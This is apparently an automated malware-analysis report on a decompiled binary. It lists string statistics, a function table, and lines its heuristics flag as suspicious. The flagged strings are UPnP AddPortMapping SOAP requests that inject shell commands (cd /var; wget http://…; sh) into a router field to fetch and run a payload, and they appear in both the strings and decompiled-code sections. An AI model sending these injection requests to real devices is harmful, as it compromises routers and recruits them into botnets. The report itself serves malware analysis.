=============================================================================
========	BINARY ID :edfc47b5e3c57a534d8dae4cfb0f3f4e8b4e64ff==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :144
SUPSCPECTED LINES COUNT :4
SUPSCPECTED STRINGS COUNT (DISTINCT) :7
SUPSCPECTED STRINGS WEIGHT :31
SUSPECT STRING SCORE : [31 / 150] 20%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :0
DYNAMIC IPs STRINGS COUNT :0
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c
`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://
POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 56973
+++TOTAL FUNCTIONS 			:124
+++LINES PER FUNCTION RATIO 	: 459.459677419355
+++SUSPECTED LINES COUNT 	: 191
+++SUSPECTED LINES RATIO 	: 0.335246520281537
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 56973
+++WHILE (TRUE) LINES			: 3262
+++WHILE (TRUE) LINES RATION		:5.72551910554122%
+++WHILE (TRUE) LOOPS COUNT		: 34
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
    int32_t v402 = function_404cf0("/dev/null"); // 0x4068e4
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");

                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");

                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_4045b0                                   |1   |783     |75            |379         |
----------------------------------------------------------------------------------------------
function_403260                                   |1   |1085    |16            |548         |
----------------------------------------------------------------------------------------------
function_401f84                                   |2   |847     |15            |340         |
----------------------------------------------------------------------------------------------
function_400624                                   |2   |712     |10            |227         |
----------------------------------------------------------------------------------------------
function_402b38                                   |2   |1091    |10            |674         |
----------------------------------------------------------------------------------------------
function_407970                                   |3   |715     |6             |22          |
----------------------------------------------------------------------------------------------
function_401104                                   |0   |832     |5             |303         |
----------------------------------------------------------------------------------------------
function_405a80                                   |4   |414     |2             |0           |
----------------------------------------------------------------------------------------------
function_405a00                                   |6   |414     |2             |0           |
----------------------------------------------------------------------------------------------
function_400984                                   |0   |498     |2             |65          |
----------------------------------------------------------------------------------------------
function_400d04                                   |1   |468     |2             |58          |
----------------------------------------------------------------------------------------------
function_405be0                                   |2   |417     |2             |0           |
----------------------------------------------------------------------------------------------
function_407ca0                                   |1   |494     |2             |74          |
----------------------------------------------------------------------------------------------
function_404134                                   |1   |488     |2             |80          |
----------------------------------------------------------------------------------------------
function_4059a0                                   |4   |414     |2             |0           |
----------------------------------------------------------------------------------------------
function_400e4c                                   |1   |470     |2             |61          |
----------------------------------------------------------------------------------------------
function_405740                                   |5   |414     |2             |0           |
----------------------------------------------------------------------------------------------
function_405ae0                                   |6   |414     |2             |0           |
----------------------------------------------------------------------------------------------
function_404834                                   |0   |418     |2             |0           |
----------------------------------------------------------------------------------------------
function_404c30                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_40471c                                   |3   |452     |1             |46          |
----------------------------------------------------------------------------------------------
function_407230                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_404cf0                                   |1   |421     |1             |0           |
----------------------------------------------------------------------------------------------
function_4072f0                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_404b70                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_4003b8                                   |4   |435     |1             |19          |
----------------------------------------------------------------------------------------------
function_404460                                   |3   |449     |1             |16          |
----------------------------------------------------------------------------------------------
function_4054d0                                   |1   |444     |1             |31          |
----------------------------------------------------------------------------------------------
function_4071d0                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_405940                                   |3   |414     |1             |0           |
----------------------------------------------------------------------------------------------
function_404b10                                   |1   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_4058c0                                   |5   |414     |1             |0           |
----------------------------------------------------------------------------------------------
function_400420                                   |6   |461     |1             |23          |
----------------------------------------------------------------------------------------------
function_400f98                                   |1   |422     |1             |15          |
----------------------------------------------------------------------------------------------
function_4074f0                                   |4   |429     |1             |0           |
----------------------------------------------------------------------------------------------
function_4057a0                                   |5   |414     |1             |0           |
----------------------------------------------------------------------------------------------
function_40491c                                   |2   |462     |1             |44          |
----------------------------------------------------------------------------------------------
function_407290                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_404550                                   |4   |441     |1             |28          |
----------------------------------------------------------------------------------------------
function_405800                                   |4   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_404c90                                   |2   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_405860                                   |4   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_407000                                   |0   |468     |1             |39          |
----------------------------------------------------------------------------------------------
function_404bd0                                   |0   |415     |1             |0           |
----------------------------------------------------------------------------------------------
function_406210                                   |2   |455     |1             |38          |
----------------------------------------------------------------------------------------------
function_405b60                                   |5   |414     |1             |0           |
----------------------------------------------------------------------------------------------
function_4069a8                                   |7   |743     |1             |18          |
----------------------------------------------------------------------------------------------
function_400584                                   |3   |434     |1             |23          |
----------------------------------------------------------------------------------------------
function_407830                                   |3   |660     |1             |91          |
----------------------------------------------------------------------------------------------
function_406884                                   |1   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_4067c0                                   |0   |433     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_405fc0                                   |2   |446     |0             |0           |
----------------------------------------------------------------------------------------------
function_405d40                                   |2   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_407f70                                   |1   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_4062fc                                   |3   |411     |0             |0           |
----------------------------------------------------------------------------------------------
function_404370                                   |2   |425     |0             |0           |
----------------------------------------------------------------------------------------------
function_406080                                   |1   |474     |0             |0           |
----------------------------------------------------------------------------------------------
function_4051a0                                   |3   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_407590                                   |2   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_40434c                                   |1   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_406f40                                   |3   |431     |0             |0           |
----------------------------------------------------------------------------------------------
function_404ab0                                   |1   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_405020                                   |0   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_404434                                   |3   |421     |0             |0           |
----------------------------------------------------------------------------------------------
function_402a88                                   |0   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_404350                                   |0   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_4029d4                                   |2   |417     |0             |0           |
----------------------------------------------------------------------------------------------
function_4002d0                                   |2   |428     |0             |0           |
----------------------------------------------------------------------------------------------
function_400328                                   |5   |438     |0             |0           |
----------------------------------------------------------------------------------------------
function_4008bc                                   |2   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_408010                                   |1   |423     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_406d10                                   |3   |423     |0             |0           |
----------------------------------------------------------------------------------------------
function_4030a8                                   |1   |436     |0             |0           |
----------------------------------------------------------------------------------------------
function_406e60                                   |1   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_4043a8                                   |0   |420     |0             |0           |
----------------------------------------------------------------------------------------------
function_405140                                   |1   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_405200                                   |1   |421     |0             |0           |
----------------------------------------------------------------------------------------------
function_405dd0                                   |1   |488     |0             |0           |
----------------------------------------------------------------------------------------------
function_4055f0                                   |0   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_4043d0                                   |2   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_401ce4                                   |0   |500     |0             |0           |
----------------------------------------------------------------------------------------------
function_406318                                   |3   |519     |0             |0           |
----------------------------------------------------------------------------------------------
function_4080d0                                   |0   |407     |0             |0           |
----------------------------------------------------------------------------------------------
function_4043a4                                   |0   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_406894                                   |2   |418     |0             |0           |
----------------------------------------------------------------------------------------------
function_40688c                                   |2   |405     |0             |0           |
----------------------------------------------------------------------------------------------
function_4056f0                                   |1   |411     |0             |0           |
----------------------------------------------------------------------------------------------
function_407dc0                                   |0   |583     |0             |0           |
----------------------------------------------------------------------------------------------
function_401050                                   |3   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_405c40                                   |2   |487     |0             |0           |
----------------------------------------------------------------------------------------------
function_400ff4                                   |0   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_406490                                   |1   |424     |0             |0           |
----------------------------------------------------------------------------------------------
function_407fa0                                   |1   |411     |0             |0           |
----------------------------------------------------------------------------------------------
function_4062d0                                   |4   |416     |0             |0           |
----------------------------------------------------------------------------------------------
function_407710                                   |2   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_404fa0                                   |3   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_404e10                                   |4   |433     |0             |0           |
----------------------------------------------------------------------------------------------
function_405d68                                   |2   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_404d6c                                   |1   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_407350                                   |2   |409     |0             |0           |
----------------------------------------------------------------------------------------------
function_404f40                                   |4   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_405d94                                   |2   |406     |0             |0           |
----------------------------------------------------------------------------------------------
function_406eb0                                   |2   |422     |0             |0           |
----------------------------------------------------------------------------------------------
function_404ee0                                   |3   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_4047d4                                   |0   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_404114                                   |0   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_4049b0                                   |0   |424     |0             |0           |
----------------------------------------------------------------------------------------------
function_407400                                   |4   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_404a40                                   |0   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_4050e0                                   |1   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_407460                                   |1   |455     |0             |0           |
----------------------------------------------------------------------------------------------
function_406e00                                   |5   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_405660                                   |3   |535     |0             |0           |
----------------------------------------------------------------------------------------------
function_400924                                   |0   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_40691c                                   |0   |425     |0             |0           |
----------------------------------------------------------------------------------------------
function_402978                                   |0   |410     |0             |0           |
----------------------------------------------------------------------------------------------
function_405330                                   |0   |493     |0             |0           |
----------------------------------------------------------------------------------------------
function_406580                                   |1   |488     |0             |0           |
----------------------------------------------------------------------------------------------
function_4055d0                                   |0   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_405080                                   |2   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_404d90                                   |2   |417     |0             |0           |
----------------------------------------------------------------------------------------------
function_4075f0                                   |2   |406     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_4045b0 ===================
++++++++ FUNCTION START 17828
++++++++ FUNCTION END 18611
++++++++ FUNCTION LENGTH 783
    while (true) {
            case 32: {
                while (true) {
                        case 32: {
                            while (true) {
                                    case 32: {
                                        while (true) {
                                                case 32: {
                                                    while (true) {
                                                            case 32: {
                                                                while (true) {
                                                                        case 32: {
                                                                            while (true) {
                                                                                    case 32: {
                                                                                        while (true) {
                                                                                                case 32: {
                                                                                                    while (true) {
                                                                                                            case 32: {
                                                                                                                while (true) {
                                                                                                                        case 32: {
                                                                                                                            while (true) {
                                                                                                                                    case 32: {
                                                                                                                                        while (true) {
                                                                                                                                                case 32: {
                                                                                                                                                    while (true) {
                                                                                                                                                            case 32: {
                                                                                                                                                                while (true) {
                                                                                                                                                                        case 32: {
                                                                                                                                                                            while (true) {
                                                                                                                                                                                    case 32: {
                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                while (true) {
                                                                                                                                                                                                                        case 32: {
                                                                                                                                                                                                                            while (true) {
                                                                                                                                                                                                                                    case 32: {
                                                                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                                                                while (true) {
                                                                                                                                                                                                                                                                        case 32: {
                                                                                                                                                                                                                                                                            while (true) {
                                                                                                                                                                                                                                                                                    case 32: {
                                                                                                                                                                                                                                                                                        while (true) {
                                                                                                                                                                                                                                                                                                case 32: {
                                                                                                                                                                                                                                                                                                    while (true) {
                                                                                                                                                                                                                                                                                                            case 32: {
                                                                                                                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                                                                                                                case 9: {
                                                                                                                                                                                                                                                                                    case 9: {
                                                                                                                                                                                                                                                                        case 9: {
                                                                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                                                                case 9: {
                                                                                                                                                                                                                                    case 9: {
                                                                                                                                                                                                                        case 9: {
                                                                                                                                                                                                            case 9: {
                                                                                                                                                                                                case 9: {
                                                                                                                                                                                    case 9: {
                                                                                                                                                                        case 9: {
                                                                                                                                                            case 9: {
                                                                                                                                                case 9: {
                                                                                                                                    case 9: {
                                                                                                                        case 9: {
                                                                                                            case 9: {
                                                                                                case 9: {
                                                                                    case 9: {
                                                                        case 9: {
                                                            case 9: {
                                                case 9: {
                                    case 9: {
                        case 9: {
            case 9: {
=================FUNCTION : function_403260 ===================
++++++++ FUNCTION START 12020
++++++++ FUNCTION END 13105
++++++++ FUNCTION LENGTH 1085
            while (true) {
                        while (true) {
                        while (true) {
                    while (true) {
                        while (true) {
                        while (true) {
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
                                            function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
                                            function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
                                            function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
                                            function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
        while (true) {
                while (true) {
            while (true) {
                while (true) {
=================FUNCTION : function_401f84 ===================
++++++++ FUNCTION START 8396
++++++++ FUNCTION END 9243
++++++++ FUNCTION LENGTH 847
    while (true) {
        while (true) {
            while (true) {
            while (true) {
                    function_405800(v449, (struct sockaddr *)&v447, 16);
                        case 263: {
                            while (true) {
                        case 0: {
                            while (true) {
                                            case 11: {
                                                while (true) {
                                            case 4: {
                                case 11: {
                                    while (true) {
                                case 4: {
=================FUNCTION : function_400624 ===================
++++++++ FUNCTION START 2843
++++++++ FUNCTION END 3555
++++++++ FUNCTION LENGTH 712
                        while (true) {
                                while (true) {
                while (true) {
                    while (true) {
            while (true) {
                while (true) {
        while (true) {
            while (true) {
    while (true) {
        while (true) {
=================FUNCTION : function_402b38 ===================
++++++++ FUNCTION START 10487
++++++++ FUNCTION END 11578
++++++++ FUNCTION LENGTH 1091
    while (true) {
            while (true) {
                    if (function_405800(v451, (struct sockaddr *)&v425, 16) != a1) {
                                                    while (true) {
                                                    while (true) {
                                        while (true) {
                                    while (true) {
        if (function_405800(v451, (struct sockaddr *)&v425, 16) != a1) {
                                        while (true) {
                                while (true) {
=================FUNCTION : function_407970 ===================
++++++++ FUNCTION START 53469
++++++++ FUNCTION END 54184
++++++++ FUNCTION LENGTH 715
                    case -2: {
                    case -1: {
                        while (true) {
                case -2: {
                case -1: {
                    while (true) {
=================FUNCTION : function_401104 ===================
++++++++ FUNCTION START 7058
++++++++ FUNCTION END 7890
++++++++ FUNCTION LENGTH 832
        while (true) {
    while (true) {
    while (true) {
        while (true) {
                            while (true) {
=================FUNCTION : function_405a80 ===================
++++++++ FUNCTION START 35217
++++++++ FUNCTION END 35631
++++++++ FUNCTION LENGTH 414
    int32_t v402 = send(sock, buf, length, flags); // 0x405aa0
    if (flags != 0) {
=================FUNCTION : function_405a00 ===================
++++++++ FUNCTION START 34800
++++++++ FUNCTION END 35214
++++++++ FUNCTION LENGTH 414
    int32_t v402 = recvfrom(sock, buf, length, flags, NULL, NULL); // 0x405a40
    if (flags != 0) {
=================FUNCTION : function_400984 ===================
++++++++ FUNCTION START 4372
++++++++ FUNCTION END 4870
++++++++ FUNCTION LENGTH 498
    while (true) {
    while (true) {
=================FUNCTION : function_400d04 ===================
++++++++ FUNCTION START 4873
++++++++ FUNCTION END 5341
++++++++ FUNCTION LENGTH 468
    while (true) {
                while (true) {
=================FUNCTION : function_405be0 ===================
++++++++ FUNCTION START 36468
++++++++ FUNCTION END 36885
++++++++ FUNCTION LENGTH 417
    int32_t sock_fd = socket(domain, type, protocol); // 0x405c00
        result = sock_fd;
=================FUNCTION : function_407ca0 ===================
++++++++ FUNCTION START 54187
++++++++ FUNCTION END 54681
++++++++ FUNCTION LENGTH 494
    while (true) {
        while (true) {
=================FUNCTION : function_404134 ===================
++++++++ FUNCTION START 13515
++++++++ FUNCTION END 14003
++++++++ FUNCTION LENGTH 488
    while (true) {
        while (true) {
=================FUNCTION : function_4059a0 ===================
++++++++ FUNCTION START 34383
++++++++ FUNCTION END 34797
++++++++ FUNCTION LENGTH 414
    int32_t v402 = recv(sock, buf, length, flags); // 0x4059c0
    if (flags != 0) {
=================FUNCTION : function_400e4c ===================
++++++++ FUNCTION START 5344
++++++++ FUNCTION END 5814
++++++++ FUNCTION LENGTH 470
    while (true) {
                while (true) {
=================FUNCTION : function_405740 ===================
++++++++ FUNCTION START 31879
++++++++ FUNCTION END 32293
++++++++ FUNCTION LENGTH 414
    int32_t accepted_sock_fd = accept(sock, addr, (int32_t *)addr_len); // 0x405760
        result = accepted_sock_fd;
=================FUNCTION : function_405ae0 ===================
++++++++ FUNCTION START 35634
++++++++ FUNCTION END 36048
++++++++ FUNCTION LENGTH 414
    int32_t v402 = sendto(sock, message, length, flags, NULL, 0); // 0x405b20
    if (flags != 0) {
=================FUNCTION : function_404834 ===================
++++++++ FUNCTION START 19476
++++++++ FUNCTION END 19894
++++++++ FUNCTION LENGTH 418
        function_405800(v403, (struct sockaddr *)&v404, 16);
        function_405860(v403, (struct sockaddr *)&v404, (int32_t)&v402);
=================FUNCTION : function_404c30 ===================
++++++++ FUNCTION START 22879
++++++++ FUNCTION END 23294
++++++++ FUNCTION LENGTH 415
    int32_t ppid = getppid(); // 0x404c50
=================FUNCTION : function_40471c ===================
++++++++ FUNCTION START 18614
++++++++ FUNCTION END 19066
++++++++ FUNCTION LENGTH 452
    while (true) {
=================FUNCTION : function_407230 ===================
++++++++ FUNCTION START 48597
++++++++ FUNCTION END 49012
++++++++ FUNCTION LENGTH 415
    int32_t v402 = geteuid(); // 0x407250
=================FUNCTION : function_404cf0 ===================
++++++++ FUNCTION START 23715
++++++++ FUNCTION END 24136
++++++++ FUNCTION LENGTH 421
    int32_t fd = open(path, oflag); // 0x404d34
=================FUNCTION : function_4072f0 ===================
++++++++ FUNCTION START 49433
++++++++ FUNCTION END 49848
++++++++ FUNCTION LENGTH 415
